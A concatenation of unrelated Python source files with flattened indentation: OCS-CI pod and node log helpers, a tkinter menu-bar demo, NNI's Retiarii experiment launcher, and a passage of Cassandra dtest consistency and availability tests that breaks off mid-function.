"""
Get logs from all pods and nodes
Returns:
dict: node/pod name as key, logs content as value (string)
"""
all_logs = {}
all_pods = pod.get_all_pods()
all_nodes = node.get_node_objs()
for node_obj in all_nodes:
node_name = node_obj.name
log_content = node.get_node_logs(node_name)
all_logs.update({node_name: log_content})
for pod_obj in all_pods:
try:
pod_name = pod_obj.name
log_content = pod.get_pod_logs(pod_name)
all_logs.update({pod_name: log_content})
except CommandFailed:
pass
return all_logs
def get_logs_with_errors(errors=None):
"""
From logs of all pods and nodes, get only logs
containing any of specified errors
Args:
errors (list): List of errors to look for
Returns:
dict: node/pod name as key, logs content as value; may be empty
"""
all_logs = get_pods_nodes_logs()
output_logs = {}
errors_list = constants.CRITICAL_ERRORS
if errors:
errors_list = errors_list + errors
for name, log_content in all_logs.items():
for error_msg in errors_list:
if error_msg in log_content:
logger.debug(f"Found '{error_msg}' in log of {name}")
output_logs.update({name: log_content})
log_path = f"{ocsci_log_path()}/{name}.log"
with open(log_path, 'w') as fh:
fh.write(log_content)
return output_logs
def modify_osd_replica_count(resource_name, replica_count):
"""
Function to modify osd replica count to 0 or 1
Args:
resource_name (str): Name of osd i.e, 'rook-ceph-osd-0-c9c4bc7c-bkf4b'
replica_count (int): osd replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = ocp.OCP(kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
resource_name = '-'.join(resource_name.split('-')[0:4])
return ocp_obj.patch(resource_name=resource_name, params=params)
|
menubars.py | from tkinter import *
from tkinter import ttk, messagebox
from halo import Halo
from threading import Thread
def close(app:Tk):
msg = messagebox.askyesno('Exit App', 'Are you sure you want to quit' , icon='warning')
if msg:
app.destroy()
app.quit()
root = Tk()
menu_bar = Menu(root)
root.geometry('800x600+500+150')
file = Menu(menu_bar, tearoff=False)
edit = Menu(menu_bar)
about = Menu(menu_bar)
# Icons
new_ico = PhotoImage(file='icons/new.png')
open_ico = PhotoImage(file='icons/open.png')
exit_ico = PhotoImage(file='icons/exit.png')
save_ico = PhotoImage(file='icons/save.png')
# Menu
file.add_command(label='New', image=new_ico, compound=LEFT)
file.add_separator()
file.add_command(label='Open', image=open_ico, compound=LEFT)
file.add_separator()
file.add_command(label='Save', image=save_ico, compound=LEFT)
file.add_separator()
file.add_command(label='Exit', image=exit_ico, compound=LEFT, command=lambda:close(root))
menu_bar.add_cascade(label='File', menu=file)
root.config(menu=menu_bar)
def start():
spinner = Halo(text='App is running', placement='right', text_color='green' , color='cyan')
spinner.animation
t = Thread(target=lambda:spinner.start())
t.start()
root.mainloop()
while True:
if root.quit:
spinner.stop()
exit(0)
start() |
pytorch.py | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import atexit
import logging
import time
from dataclasses import dataclass
import os
from pathlib import Path
import socket
from subprocess import Popen
from threading import Thread
import time
from typing import Any, List, Optional, Union
import colorama
import psutil
import torch
import torch.nn as nn
import nni.runtime.log
from nni.experiment import Experiment, TrainingServiceConfig
from nni.experiment import management, launcher, rest
from nni.experiment.config import util
from nni.experiment.config.base import ConfigBase, PathLike
from nni.experiment.pipe import Pipe
from nni.tools.nnictl.command_utils import kill_command
from ..codegen import model_to_pytorch_script
from ..converter import convert_to_graph
from ..execution import list_models, set_execution_engine
from ..execution.python import get_mutation_dict
from ..graph import Model, Evaluator
from ..integration import RetiariiAdvisor
from ..mutator import Mutator
from ..nn.pytorch.mutator import process_inline_mutation, extract_mutation_from_pt_module
from ..strategy import BaseStrategy
from ..oneshot.interface import BaseOneShotTrainer
_logger = logging.getLogger(__name__)
@dataclass(init=False)
class RetiariiExeConfig(ConfigBase):
experiment_name: Optional[str] = None
search_space: Any = '' # TODO: remove
trial_command: str = '_reserved'
trial_code_directory: PathLike = '.'
trial_concurrency: int
trial_gpu_number: int = 0
max_experiment_duration: Optional[str] = None
max_trial_number: Optional[int] = None
nni_manager_ip: Optional[str] = None
debug: bool = False
log_level: Optional[str] = None
experiment_working_directory: PathLike = '~/nni-experiments'
# remove configuration of tuner/assessor/advisor
training_service: TrainingServiceConfig
execution_engine: str = 'py'
def __init__(self, training_service_platform: Optional[str] = None, **kwargs):
super().__init__(**kwargs)
if training_service_platform is not None:
assert 'training_service' not in kwargs
self.training_service = util.training_service_config_factory(platform = training_service_platform)
self.__dict__['trial_command'] = 'python3 -m nni.retiarii.trial_entry py'
def __setattr__(self, key, value):
fixed_attrs = {'search_space': '',
'trial_command': '_reserved'}
if key in fixed_attrs and fixed_attrs[key] != value:
raise AttributeError(f'{key} is not supposed to be set in Retiarii mode by users!')
# 'trial_code_directory' is handled differently because the path will be converted to absolute path by us
if key == 'trial_code_directory' and not (value == Path('.') or os.path.isabs(value)):
raise AttributeError(f'{key} is not supposed to be set in Retiarii mode by users!')
if key == 'execution_engine':
assert value in ['base', 'py', 'cgo'], f'The specified execution engine "{value}" is not supported.'
self.__dict__['trial_command'] = 'python3 -m nni.retiarii.trial_entry ' + value
self.__dict__[key] = value
def validate(self, initialized_tuner: bool = False) -> None:
super().validate()
@property
def _canonical_rules(self):
return _canonical_rules
@property
def _validation_rules(self):
return _validation_rules
_canonical_rules = {
'trial_code_directory': util.canonical_path,
'max_experiment_duration': lambda value: f'{util.parse_time(value)}s' if value is not None else None,
'experiment_working_directory': util.canonical_path
}
_validation_rules = {
'trial_code_directory': lambda value: (Path(value).is_dir(), f'"{value}" does not exist or is not directory'),
'trial_concurrency': lambda value: value > 0,
'trial_gpu_number': lambda value: value >= 0,
'max_experiment_duration': lambda value: util.parse_time(value) > 0,
'max_trial_number': lambda value: value > 0,
'log_level': lambda value: value in ["trace", "debug", "info", "warning", "error", "fatal"],
'training_service': lambda value: (type(value) is not TrainingServiceConfig, 'cannot be abstract base class')
}
def preprocess_model(base_model, trainer, applied_mutators, full_ir=True):
# TODO: this logic might need to be refactored into execution engine
if full_ir:
try:
script_module = torch.jit.script(base_model)
except Exception as e:
_logger.error('Your base model cannot be parsed by torch.jit.script, please fix the following error:')
raise e
base_model_ir = convert_to_graph(script_module, base_model)
# handle inline mutations
mutators = process_inline_mutation(base_model_ir)
else:
base_model_ir, mutators = extract_mutation_from_pt_module(base_model)
base_model_ir.evaluator = trainer
if mutators is not None and applied_mutators:
raise RuntimeError('Have not supported mixed usage of LayerChoice/InputChoice and mutators, '
'do not use mutators when you use LayerChoice/InputChoice')
if mutators is not None:
applied_mutators = mutators
return base_model_ir, applied_mutators
def debug_mutated_model(base_model, trainer, applied_mutators):
"""
Locally run only one trial without launching an experiment for debug purpose, then exit.
For example, it can be used to quickly check shape mismatch.
Specifically, it applies mutators (default to choose the first candidate for the choices)
to generate a new model, then run this model locally.
Parameters
----------
base_model : nni.retiarii.nn.pytorch.nn.Module
the base model
trainer : nni.retiarii.evaluator
the training class of the generated models
applied_mutators : list
a list of mutators that will be applied on the base model for generating a new model
"""
base_model_ir, applied_mutators = preprocess_model(base_model, trainer, applied_mutators)
from ..strategy import _LocalDebugStrategy
strategy = _LocalDebugStrategy()
strategy.run(base_model_ir, applied_mutators)
_logger.info('local debug completed!')
class RetiariiExperiment(Experiment):
def __init__(self, base_model: nn.Module, trainer: Union[Evaluator, BaseOneShotTrainer],
applied_mutators: List[Mutator] = None, strategy: BaseStrategy = None):
# TODO: The current design of init interface of Retiarii experiment needs to be reviewed.
self.config: RetiariiExeConfig = None
self.port: Optional[int] = None
self.base_model = base_model
self.trainer = trainer
self.applied_mutators = applied_mutators
self.strategy = strategy
self._dispatcher = RetiariiAdvisor()
self._dispatcher_thread: Optional[Thread] = None
self._proc: Optional[Popen] = None
self._pipe: Optional[Pipe] = None
def _start_strategy(self):
base_model_ir, self.applied_mutators = preprocess_model(
self.base_model, self.trainer, self.applied_mutators, full_ir=self.config.execution_engine != 'py')
_logger.info('Start strategy...')
self.strategy.run(base_model_ir, self.applied_mutators)
_logger.info('Strategy exit')
# TODO: find out a proper way to show no more trial message on WebUI
#self._dispatcher.mark_experiment_as_ending()
def start(self, port: int = 8080, debug: bool = False) -> None:
"""
Start the experiment in background.
This method will raise exception on failure.
If it returns, the experiment should have been successfully started.
Parameters
----------
port
The port of web UI.
debug
Whether to start in debug mode.
"""
atexit.register(self.stop)
# we will probably need a execution engine factory to make this clean and elegant
if self.config.execution_engine == 'base':
from ..execution.base import BaseExecutionEngine
engine = BaseExecutionEngine()
elif self.config.execution_engine == 'cgo':
from ..execution.cgo_engine import CGOExecutionEngine
engine = CGOExecutionEngine()
elif self.config.execution_engine == 'py':
from ..execution.python import PurePythonExecutionEngine
engine = PurePythonExecutionEngine()
set_execution_engine(engine)
self.id = management.generate_experiment_id()
if self.config.experiment_working_directory is not None:
log_dir = Path(self.config.experiment_working_directory, self.id, 'log')
else:
log_dir = Path.home() / f'nni-experiments/{self.id}/log'
nni.runtime.log.start_experiment_log(self.id, log_dir, debug)
self._proc, self._pipe = launcher.start_experiment_retiarii(self.id, self.config, port, debug)
assert self._proc is not None
assert self._pipe is not None
self.port = port # port will be None if start up failed
# dispatcher must be launched after pipe initialized
# the logic to launch dispatcher in background should be refactored into dispatcher api
self._dispatcher = self._create_dispatcher()
self._dispatcher_thread = Thread(target=self._dispatcher.run)
self._dispatcher_thread.start()
ips = [self.config.nni_manager_ip]
for interfaces in psutil.net_if_addrs().values():
for interface in interfaces:
if interface.family == socket.AF_INET:
ips.append(interface.address)
ips = [f'http://{ip}:{port}' for ip in ips if ip]
msg = 'Web UI URLs: ' + colorama.Fore.CYAN + ' '.join(ips) + colorama.Style.RESET_ALL
_logger.info(msg)
exp_status_checker = Thread(target=self._check_exp_status)
exp_status_checker.start()
self._start_strategy()
# TODO: the experiment should be completed, when strategy exits and there is no running job
_logger.info('Waiting for experiment to become DONE (you can ctrl+c if there is no running trial jobs)...')
exp_status_checker.join()
def _create_dispatcher(self):
return self._dispatcher
def run(self, config: RetiariiExeConfig = None, port: int = 8080, debug: bool = False) -> str:
"""
Run the experiment.
This function will block until experiment finish or error.
"""
if isinstance(self.trainer, BaseOneShotTrainer):
self.trainer.fit()
else:
assert config is not None, 'You are using classic search mode, config cannot be None!'
self.config = config
self.start(port, debug)
def _check_exp_status(self) -> bool:
"""
Run the experiment.
This function will block until experiment finish or error.
Return `True` when experiment done; or return `False` when experiment failed.
"""
try:
while True:
time.sleep(10)
# this if is to deal with the situation that
# nnimanager is cleaned up by ctrl+c first
if self._proc.poll() is None:
status = self.get_status()
else:
return False
if status == 'DONE' or status == 'STOPPED':
return True
if status == 'ERROR':
return False
except KeyboardInterrupt:
_logger.warning('KeyboardInterrupt detected')
finally:
self.stop()
def stop(self) -> None:
"""
Stop background experiment.
"""
_logger.info('Stopping experiment, please wait...')
atexit.unregister(self.stop)
if self.id is not None:
nni.runtime.log.stop_experiment_log(self.id)
if self._proc is not None:
try:
# this if is to deal with the situation that
# nnimanager is cleaned up by ctrl+c first
if self._proc.poll() is None:
rest.delete(self.port, '/experiment')
except Exception as e:
_logger.exception(e)
_logger.warning('Cannot gracefully stop experiment, killing NNI process...')
kill_command(self._proc.pid)
if self._pipe is not None:
self._pipe.close()
if self._dispatcher_thread is not None:
self._dispatcher.stopping = True
self._dispatcher_thread.join(timeout=1)
self.id = None
self.port = None
self._proc = None
self._pipe = None
self._dispatcher = None
self._dispatcher_thread = None
_logger.info('Experiment stopped')
def export_top_models(self, top_k: int = 1, optimize_mode: str = 'maximize', formatter: str = 'dict') -> Any:
"""
Export several top performing models.
For one-shot algorithms, only top-1 is supported. For others, ``optimize_mode`` and ``formatter`` are
available for customization.
top_k : int
How many models are intended to be exported.
optimize_mode : str
``maximize`` or ``minimize``. Not supported by one-shot algorithms.
``optimize_mode`` is likely to be removed and defined in strategy in future.
formatter : str
Support ``code`` and ``dict``. Not supported by one-shot algorithms.
If ``code``, the python code of model will be returned.
If ``dict``, the mutation history will be returned.
"""
if formatter == 'code':
assert self.config.execution_engine != 'py', 'You should use `dict` formatter when using Python execution engine.'
if isinstance(self.trainer, BaseOneShotTrainer):
assert top_k == 1, 'Only support top_k is 1 for now.'
return self.trainer.export()
else:
all_models = filter(lambda m: m.metric is not None, list_models())
assert optimize_mode in ['maximize', 'minimize']
all_models = sorted(all_models, key=lambda m: m.metric, reverse=optimize_mode == 'maximize')
assert formatter in ['code', 'dict'], 'Export formatter other than "code" and "dict" is not supported yet.'
if formatter == 'code':
return [model_to_pytorch_script(model) for model in all_models[:top_k]]
elif formatter == 'dict':
return [get_mutation_dict(model) for model in all_models[:top_k]]
def retrain_model(self, model):
"""
this function retrains the exported model, and test it to output test accuracy
"""
raise NotImplementedError
|
consistency_test.py | import queue
import sys
import threading
import time
import pytest
import logging
from collections import OrderedDict, namedtuple
from copy import deepcopy
from cassandra import ConsistencyLevel, consistency_value_to_name
from cassandra.query import BatchStatement, BatchType, SimpleStatement
from tools.assertions import (assert_all, assert_length_equal, assert_none,
assert_unavailable)
from dtest import MultiError, Tester, create_ks, create_cf
from tools.data import (create_c1c2_table, insert_c1c2, insert_columns,
query_c1c2, rows_to_list)
since = pytest.mark.since
ported_to_in_jvm = pytest.mark.ported_to_in_jvm
logger = logging.getLogger(__name__)
ExpectedConsistency = namedtuple('ExpectedConsistency', ('num_write_nodes', 'num_read_nodes', 'is_strong'))
class TestHelper(Tester):
def _is_local(self, cl):
return (cl == ConsistencyLevel.LOCAL_QUORUM or
cl == ConsistencyLevel.LOCAL_ONE or
cl == ConsistencyLevel.LOCAL_SERIAL)
def _is_conditional(self, cl):
return (cl == ConsistencyLevel.SERIAL or
cl == ConsistencyLevel.LOCAL_SERIAL)
def _required_nodes(self, cl, rf_factors, dc):
"""
Return the number of nodes required by this consistency level
in the current data center, specified by the dc parameter,
given a list of replication factors, one per dc.
"""
return {
ConsistencyLevel.ANY: 1,
ConsistencyLevel.ONE: 1,
ConsistencyLevel.TWO: 2,
ConsistencyLevel.THREE: 3,
ConsistencyLevel.QUORUM: sum(rf_factors) // 2 + 1,
ConsistencyLevel.ALL: sum(rf_factors),
ConsistencyLevel.LOCAL_QUORUM: rf_factors[dc] // 2 + 1,
ConsistencyLevel.EACH_QUORUM: rf_factors[dc] // 2 + 1,
ConsistencyLevel.SERIAL: sum(rf_factors) // 2 + 1,
ConsistencyLevel.LOCAL_SERIAL: rf_factors[dc] // 2 + 1,
ConsistencyLevel.LOCAL_ONE: 1,
}[cl]
def get_expected_consistency(self, idx, rf_factors, write_cl, read_cl):
"""
Given a node index, identify to which data center we are connecting and return
the expected consistency: number of nodes we write to, read from, and whether
we should have strong consistency, that is whether R + W > N
"""
nodes = [self.nodes] if isinstance(self.nodes, int) else self.nodes
def get_data_center():
"""
:return: the data center corresponding to this node
"""
dc = 0
for i in range(1, len(nodes)):
if idx < sum(nodes[:i]):
break
dc += 1
return dc
data_center = get_data_center()
if write_cl == ConsistencyLevel.EACH_QUORUM:
write_nodes = sum([self._required_nodes(write_cl, rf_factors, i) for i in range(0, len(nodes))])
else:
write_nodes = self._required_nodes(write_cl, rf_factors, data_center)
read_nodes = self._required_nodes(read_cl, rf_factors, data_center)
is_strong = read_nodes + write_nodes > sum(rf_factors)
return ExpectedConsistency(num_write_nodes=write_nodes,
num_read_nodes=read_nodes,
is_strong=is_strong)
def _should_succeed(self, cl, rf_factors, num_nodes_alive, current):
"""
Return true if the read or write operation should succeed based on
the consistency level requested, the replication factors and the
number of nodes alive in each data center.
"""
if self._is_local(cl):
return num_nodes_alive[current] >= self._required_nodes(cl, rf_factors, current)
elif cl == ConsistencyLevel.EACH_QUORUM:
for i in range(0, len(rf_factors)):
if num_nodes_alive[i] < self._required_nodes(cl, rf_factors, i):
return False
return True
else:
return sum(num_nodes_alive) >= self._required_nodes(cl, rf_factors, current)
def _start_cluster(self, save_sessions=False, requires_local_reads=False):
cluster = self.cluster
nodes = self.nodes
rf = self.rf
configuration_options = {'hinted_handoff_enabled': False}
# If we must read from the local replica first, then the dynamic snitch poses a problem
# because occasionally it may think that another replica is preferable even if the
# coordinator is a replica
if requires_local_reads:
configuration_options['dynamic_snitch'] = False
cluster.set_configuration_options(values=configuration_options)
cluster.populate(nodes)
if requires_local_reads and isinstance(nodes, int):
# Changing the snitch to PropertyFileSnitch even in the
# single dc tests ensures that StorageProxy sorts the replicas eligible
# for reading by proximity to the local host, essentially picking the
# local host for local reads, see IEndpointSnitch.sortByProximity() and
# StorageProxy.getLiveSortedEndpoints(), which is called by the AbstractReadExecutor
# to determine the target replicas. The default case, a SimpleSnitch wrapped in
# a dynamic snitch, may rarely choose a different replica.
logger.debug('Changing snitch for single dc case')
for node in cluster.nodelist():
node.data_center = 'dc1'
cluster.set_configuration_options(values={
'endpoint_snitch': 'org.apache.cassandra.locator.PropertyFileSnitch'})
cluster.start()
self.ksname = 'mytestks'
session = self.patient_exclusive_cql_connection(cluster.nodelist()[0])
create_ks(session, self.ksname, rf)
self.create_tables(session, requires_local_reads)
if save_sessions:
self.sessions = []
self.sessions.append(session)
for node in cluster.nodelist()[1:]:
self.sessions.append(self.patient_exclusive_cql_connection(node, self.ksname))
def create_tables(self, session, requires_local_reads):
self.create_users_table(session, requires_local_reads)
self.create_counters_table(session, requires_local_reads)
session.cluster.control_connection.wait_for_schema_agreement(wait_time=60)
def truncate_tables(self, session):
statement = SimpleStatement("TRUNCATE users", ConsistencyLevel.ALL)
session.execute(statement)
statement = SimpleStatement("TRUNCATE counters", ConsistencyLevel.ALL)
session.execute(statement)
def create_users_table(self, session, requires_local_reads):
create_cmd = """
CREATE TABLE users (
userid int PRIMARY KEY,
firstname text,
lastname text,
age int
)"""
if requires_local_reads:
create_cmd += " WITH " + self.get_local_reads_properties(self.cluster.version())
session.execute(create_cmd)
@staticmethod
def get_local_reads_properties(cluster_version):
"""
If we must read from the local replica first, then we should disable read repair and
speculative retry, see CASSANDRA-12092
"""
if cluster_version < '4.0':
return " dclocal_read_repair_chance = 0 AND read_repair_chance = 0 AND speculative_retry = 'NONE'"
else:
return " speculative_retry = 'NONE'"
def insert_user(self, session, userid, age, consistency, serial_consistency=None):
text = "INSERT INTO users (userid, firstname, lastname, age) VALUES ({}, 'first{}', 'last{}', {}) {}"\
.format(userid, userid, userid, age, "IF NOT EXISTS" if serial_consistency else "")
statement = SimpleStatement(text, consistency_level=consistency, serial_consistency_level=serial_consistency)
session.execute(statement)
def update_user(self, session, userid, age, consistency, serial_consistency=None, prev_age=None):
text = "UPDATE users SET age = {} WHERE userid = {}".format(age, userid)
if serial_consistency and prev_age:
text = text + " IF age = {}".format(prev_age)
statement = SimpleStatement(text, consistency_level=consistency, serial_consistency_level=serial_consistency)
session.execute(statement)
def delete_user(self, session, userid, consistency):
statement = SimpleStatement("DELETE FROM users where userid = {}".format(userid), consistency_level=consistency)
session.execute(statement)
def query_user(self, session, userid, age, consistency, check_ret=True):
statement = SimpleStatement("SELECT userid, age FROM users where userid = {}".format(userid), consistency_level=consistency)
res = session.execute(statement)
expected = [[userid, age]] if age else []
ret = rows_to_list(res) == expected
if check_ret:
assert ret, "Got {} from {}, expected {} at {}".format(rows_to_list(res), session.cluster.contact_points, expected, consistency_value_to_name(consistency))
return ret
def create_counters_table(self, session, requires_local_reads):
create_cmd = """
CREATE TABLE counters (
id int PRIMARY KEY,
c counter
)"""
if requires_local_reads:
create_cmd += " WITH " + self.get_local_reads_properties(self.cluster.version())
session.execute(create_cmd)
def update_counter(self, session, id, consistency, serial_consistency=None):
text = "UPDATE counters SET c = c + 1 WHERE id = {}".format(id)
statement = SimpleStatement(text, consistency_level=consistency, serial_consistency_level=serial_consistency)
session.execute(statement)
return statement
def query_counter(self, session, id, val, consistency, check_ret=True):
statement = SimpleStatement("SELECT * from counters WHERE id = {}".format(id), consistency_level=consistency)
ret = rows_to_list(session.execute(statement))
if check_ret:
assert ret[0][1] == val, "Got {} from {}, expected {} at {}".format(ret[0][1],
session.cluster.contact_points,
val,
consistency_value_to_name(consistency))
return ret[0][1] if ret else 0
class TestAvailability(TestHelper):
"""
Test that we can read and write depending on the number of nodes that are alive and the consistency levels.
"""
def _test_simple_strategy(self, combinations):
"""
Helper test function for a single data center: invoke _test_insert_query_from_node() for each node
and each combination, progressively stopping nodes.
"""
cluster = self.cluster
nodes = self.nodes
rf = self.rf
num_alive = nodes
for node in range(nodes):
logger.debug('Testing node {} in single dc with {} nodes alive'.format(node, num_alive))
session = self.patient_exclusive_cql_connection(cluster.nodelist()[node], self.ksname)
for combination in combinations:
self._test_insert_query_from_node(session, 0, [rf], [num_alive], *combination)
self.cluster.nodelist()[node].stop()
num_alive -= 1
def _test_network_topology_strategy(self, combinations):
"""
Helper test function for multiple data centers, invoke _test_insert_query_from_node() for each node
in each dc and each combination, progressively stopping nodes.
"""
cluster = self.cluster
nodes = self.nodes
rf = self.rf
nodes_alive = deepcopy(nodes)
rf_factors = list(rf.values())
for i in range(0, len(nodes)): # for each dc
logger.debug('Testing dc {} with rf {} and {} nodes alive'.format(i, rf_factors[i], nodes_alive))
for n in range(nodes[i]): # for each node in this dc
logger.debug('Testing node {} in dc {} with {} nodes alive'.format(n, i, nodes_alive))
node = n + sum(nodes[:i])
session = self.patient_exclusive_cql_connection(cluster.nodelist()[node], self.ksname)
for combination in combinations:
self._test_insert_query_from_node(session, i, rf_factors, nodes_alive, *combination)
self.cluster.nodelist()[node].stop(wait_other_notice=True)
nodes_alive[i] -= 1
def _test_insert_query_from_node(self, session, dc_idx, rf_factors, num_nodes_alive, write_cl, read_cl, serial_cl=None, check_ret=True):
"""
Test availability for read and write via the session passed in as a parameter.
"""
logger.debug("Connected to %s for %s/%s/%s" %
(session.cluster.contact_points, consistency_value_to_name(write_cl), consistency_value_to_name(read_cl), consistency_value_to_name(serial_cl)))
start = 0
end = 100
age = 30
if self._should_succeed(write_cl, rf_factors, num_nodes_alive, dc_idx):
for n in range(start, end):
self.insert_user(session, n, age, write_cl, serial_cl)
else:
assert_unavailable(self.insert_user, session, end, age, write_cl, serial_cl)
if self._should_succeed(read_cl, rf_factors, num_nodes_alive, dc_idx):
for n in range(start, end):
self.query_user(session, n, age, read_cl, check_ret)
else:
assert_unavailable(self.query_user, session, end, age, read_cl, check_ret)
def test_simple_strategy(self):
"""
Test for a single datacenter, using simple replication strategy.
"""
self.nodes = 3
self.rf = 3
self._start_cluster()
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE, None, False),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.QUORUM, ConsistencyLevel.TWO),
(ConsistencyLevel.QUORUM, ConsistencyLevel.THREE),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ANY, ConsistencyLevel.ONE, None, False),
(ConsistencyLevel.LOCAL_ONE, ConsistencyLevel.LOCAL_ONE, None, False),
(ConsistencyLevel.QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.LOCAL_SERIAL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.LOCAL_SERIAL),
]
self._test_simple_strategy(combinations)
@since("3.0")
def test_simple_strategy_each_quorum(self):
"""
@jira_ticket CASSANDRA-10584
Test for a single datacenter, using simple replication strategy, only
the each quorum reads.
"""
self.nodes = 3
self.rf = 3
self._start_cluster()
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
self._test_simple_strategy(combinations)
@pytest.mark.resource_intensive
def test_network_topology_strategy(self):
"""
Test for multiple datacenters, using network topology replication strategy.
"""
self.nodes = [3, 3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3), ('dc3', 3)])
self._start_cluster()
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE, None, False),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.QUORUM, ConsistencyLevel.TWO),
(ConsistencyLevel.QUORUM, ConsistencyLevel.THREE),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ANY, ConsistencyLevel.ONE, None, False),
(ConsistencyLevel.LOCAL_ONE, ConsistencyLevel.LOCAL_ONE, None, False),
(ConsistencyLevel.QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.LOCAL_SERIAL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.LOCAL_SERIAL),
]
self._test_network_topology_strategy(combinations)
@pytest.mark.resource_intensive
@since("3.0")
def test_network_topology_strategy_each_quorum(self):
"""
@jira_ticket CASSANDRA-10584
Test for multiple datacenters, using network topology strategy, only
the each quorum reads.
"""
self.nodes = [3, 3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3), ('dc3', 3)])
self._start_cluster()
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
self._test_network_topology_strategy(combinations)
class TestAccuracy(TestHelper):
"""
Test that we can consistently read back what we wrote depending on the write and read consistency levels.
"""
class Validation:
def __init__(self, outer, sessions, nodes, rf_factors, start, end, write_cl, read_cl, serial_cl=None):
self.outer = outer
self.sessions = sessions
self.nodes = nodes
self.rf_factors = rf_factors
self.start = start
self.end = end
self.write_cl = write_cl
self.read_cl = read_cl
self.serial_cl = serial_cl
logger.debug('Testing accuracy with WRITE/READ/SERIAL consistency set to {}/{}/{} (keys : {} to {})'
.format(consistency_value_to_name(write_cl), consistency_value_to_name(read_cl), consistency_value_to_name(serial_cl), start, end - 1))
def get_expected_consistency(self, idx):
return self.outer.get_expected_consistency(idx, self.rf_factors, self.write_cl, self.read_cl)
def validate_users(self):
"""
First validation function: update the users table sending different values to different sessions
and check that when strong_consistency is true (R + W > N) we read back the latest value from all sessions.
If strong_consistency is false we instead check that we read back the latest value from at least
the number of nodes we wrote to.
"""
outer = self.outer
sessions = self.sessions
start = self.start
end = self.end
write_cl = self.write_cl
read_cl = self.read_cl
serial_cl = self.serial_cl
def check_all_sessions(idx, n, val):
expected_consistency = self.get_expected_consistency(idx)
num = 0
for s in sessions:
if outer.query_user(s, n, val, read_cl, check_ret=expected_consistency.is_strong):
num += 1
assert num >= expected_consistency.num_write_nodes, "Failed to read value from sufficient number of nodes," + \
" required {} but got {} - [{}, {}]".format(expected_consistency.num_write_nodes, num, n, val)
for n in range(start, end):
age = 30
for s in range(0, len(sessions)):
outer.insert_user(sessions[s], n, age, write_cl, serial_cl)
check_all_sessions(s, n, age)
if serial_cl is None:
age += 1
for s in range(0, len(sessions)):
outer.update_user(sessions[s], n, age, write_cl, serial_cl, age - 1)
check_all_sessions(s, n, age)
age += 1
outer.delete_user(sessions[0], n, write_cl)
check_all_sessions(s, n, None)
def validate_counters(self):
"""
Second validation function: update the counters table sending different values to different sessions
and check that when strong_consistency is true (R + W > N) we read back the latest value from all sessions.
If strong_consistency is false we instead check that we read back the latest value from at least
the number of nodes we wrote to.
"""
outer = self.outer
sessions = self.sessions
start = self.start
end = self.end
write_cl = self.write_cl
read_cl = self.read_cl
serial_cl = self.serial_cl
def check_all_sessions(idx, n, val):
expected_consistency = self.get_expected_consistency(idx)
results = []
for s in sessions:
results.append(outer.query_counter(s, n, val, read_cl, check_ret=expected_consistency.is_strong))
assert results.count(val) >= expected_consistency.num_write_nodes, "Failed to read value from sufficient number of nodes, required {} nodes to have a" + \
" counter value of {} at key {}, instead got these values: {}".format(expected_consistency.num_write_nodes, val, n, results)
for n in range(start, end):
c = 1
for s in range(0, len(sessions)):
outer.update_counter(sessions[s], n, write_cl, serial_cl)
check_all_sessions(s, n, c)
# Update the counter again at CL ALL to make sure all nodes are on the same page
# since a counter update requires a read
outer.update_counter(sessions[s], n, ConsistencyLevel.ALL)
c += 2 # the counter was updated twice
def _run_test_function_in_parallel(self, valid_fcn, nodes, rf_factors, combinations):
"""
Run a test function in parallel.
"""
requires_local_reads = False
for combination in combinations:
for i, _ in enumerate(nodes):
expected_consistency = self.get_expected_consistency(i, rf_factors, combination[0], combination[1])
if not expected_consistency.is_strong:
# if at least one combination does not reach strong consistency, in order to validate weak
# consistency we require local reads, see CASSANDRA-12092 for details.
requires_local_reads = True
break
if requires_local_reads:
break
self._start_cluster(save_sessions=True, requires_local_reads=requires_local_reads)
input_queue = queue.Queue()
